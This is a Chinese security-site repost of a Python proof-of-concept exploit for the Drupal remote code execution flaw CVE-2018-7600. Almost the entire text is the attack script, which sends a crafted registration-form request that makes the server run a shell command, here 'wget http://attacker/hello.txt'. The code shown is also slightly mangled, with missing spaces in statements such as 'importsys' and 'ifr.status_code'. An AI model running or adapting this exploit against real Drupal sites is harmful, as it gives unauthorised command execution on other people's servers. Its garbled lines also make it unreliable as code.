|
|
| 顶 | 踩 |
| 标题 | 简介 | 类型 | 公开时间 | ||||||||||
|
|||||||||||||
|
|||||||||||||
| 详情 | |||||||||||||
|
[SAFE-ID: JIWO-2024-1433] 作者: ecawen 发表于: [2018-04-08] [2018-04-20]被用户:ecawen 修改过
本文共 [311] 位读者顶过
[出自:jiwo.org]
#!/usr/bin/env
importsys
importrequests
print('################################################################')
print('# Proof-Of-Concept for CVE-2018-7600')
print('# by Vitalii Rudnykh')
print('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
print('# https://github.com/a2u/CVE-2018-7600')
print('################################################################')
print('Provided only for educational or information purposes\n')
target=raw_input('Enter target url (example: https://domain.ltd/): ')
url=target+'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
payload={'form_id':'user_register_form','_drupal_ajax':'1','mail[#post_render][]':'exec','mail[#type]':'markup','mail[#markup]':'wget http://attacker/hello.txt'}
r=requests.post(url, data=payload)
ifr.status_code !=200:
sys.exit("Not exploitable")
print('\nCheck: '+target+'hello.txt')
|
|||||||||||||
|
|
|
| 顶 | 踩 |